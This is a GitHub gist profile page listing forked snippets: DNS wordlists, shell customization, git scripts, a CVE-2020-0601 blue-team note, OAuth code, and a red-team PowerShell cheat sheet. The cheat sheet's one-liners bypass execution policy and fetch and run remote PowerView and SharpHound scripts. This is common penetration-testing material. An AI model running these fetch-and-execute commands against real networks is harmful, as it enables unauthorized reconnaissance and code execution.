Skip to content

Instantly share code, notes, and snippets.

View harmzway's full-sized avatar

harmzway harmzway

View GitHub Profile
@harmzway
harmzway / all.txt
Created January 9, 2019 09:49 — forked from jhaddix/all.txt
all wordlists from every dns enumeration tool... ever. Please excuse the lewd entries =/
This file has been truncated, but you can view the full file.
.
..
........
@
*
*.*
*.*.*
🐎
@harmzway
harmzway / PowerShell Customization.md
Created June 8, 2019 01:45 — forked from jchandra74/PowerShell Customization.md
PowerShell, Cmder / ConEmu, Posh-Git, Oh-My-Posh, Powerline Customization

Pimping Up Your PowerShell & Cmder with Posh-Git, Oh-My-Posh, & Powerline Fonts

Backstory (TLDR)

I work as a full-stack developer at work. We are a Windows & Azure shop, so we are using Windows as our development platform, hence this customization.

For my console needs, I am using Cmder which is based on ConEmu with PowerShell as my shell of choice.

Yes, yes, I know nowadays you can use the Linux subsystem on Windows 10 which allow you to run Ubuntu on Windows. If you are looking for customization of the Ubuntu bash shell, check out this article by Scott Hanselman.

@harmzway
harmzway / gist:b26592f400fd93f4b76674c382f81b29
Created September 4, 2019 16:29 — forked from rmmh/gist:8515577
MSP430 Alphanumeric Instructions
[0-9a-zA-Z]{2}
30-39,41-5a,61-7a
a:61 z:7a A:41 Z:5a 0:30 9:39
MSP430 alphanumeric shellcode is hard. There's no way to write to memory,
no word-sized reg-reg operations, and all we have is add/sub/mov and a few conditional jumps.
@harmzway
harmzway / .gitignore
Created September 4, 2019 16:37 — forked from octocat/.gitignore
Some common .gitignore configurations
# Compiled source #
###################
*.com
*.class
*.dll
*.exe
*.o
*.so
# Packages #
@harmzway
harmzway / git-author-rewrite.sh
Created September 4, 2019 16:47 — forked from octocat/git-author-rewrite.sh
#!/bin/sh
git filter-branch --env-filter '
OLD_EMAIL="your-old-email@example.com"
CORRECT_NAME="Your Correct Name"
CORRECT_EMAIL="your-correct-email@example.com"
if [ "$GIT_COMMITTER_EMAIL" = "$OLD_EMAIL" ]
then
@harmzway
harmzway / ssh_key_add.sh
Created September 4, 2019 16:47 — forked from octocat/ssh_key_add.sh
# Note: ~/.ssh/environment should not be used, as it
# already has a different purpose in SSH.
env=~/.ssh/agent.env
# Note: Don't bother checking SSH_AGENT_PID. It's not used
# by SSH itself, and it might even be incorrect
# (for example, when using agent-forwarding over SSH).
agent_is_running() {
@harmzway
harmzway / 20200114-TLP-WHITE_CVE-2020-0601.md
Created January 16, 2020 17:33 — forked from SwitHak/20200114-TLP-WHITE_CVE-2020-0601.md
BlueTeam CheatSheet * CVE-2020-0601 * crypt32.dll | Last updated: 2020-01-16 1505 UTC

CVE-2020-0601 AKA ChainOfFools

General

  • Microsoft disclosed a vulnerability in their monthly Patch Tuesday referenced under CVE-2020-0601.
  • The vulnerability was discovered by the U.S. National Security Agency, anounced today (2020-01-14) in their press conference, followed by a blog post and an official security advisory.
  • The flaw is located in the "CRYPT32.DLL" file under the C:\Windows\System32\ directory.

Vulnerability explanation

  • NSA description:
  • NSA has discovered a critical vulnerability (CVE-2020-0601) affecting Microsoft Windows® cryptographic functionality.
@harmzway
harmzway / make_favicon.sh
Created January 16, 2020 22:47 — forked from nateware/make_favicon.sh
Imagemagick to create favicon.ico with 16x16 and 32x32 sizes in it
# IE is still braindead so still use favicon.ico
convert -resize x16 -gravity center -crop 16x16+0+0 -flatten -colors 256 input.png output-16x16.ico
convert -resize x32 -gravity center -crop 32x32+0+0 -flatten -colors 256 input.png output-32x32.ico
convert output-16x16.ico output-32x32.ico favicon.ico
# Then, HTML needs to specify size="XxY" as largest size due to browser bugs
<link rel="shortcut icon" href="/favicon.ico" sizes="32x32">
@harmzway
harmzway / RedTeam_CheatSheet.ps1
Created January 16, 2020 23:09 — forked from m8sec/RedTeam_CheatSheet.ps1
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
@harmzway
harmzway / YouTube-OAuth-Snippets
Created September 11, 2020 00:19 — forked from CoreyMSchafer/YouTube-OAuth-Snippets
YouTube-OAuth-Snippets
# token.pickle stores the user's credentials from previously successful logins
if os.path.exists('token.pickle'):
print('Loading Credentials From File...')
with open('token.pickle', 'rb') as token:
credentials = pickle.load(token)
# Google's Request
from google.auth.transport.requests import Request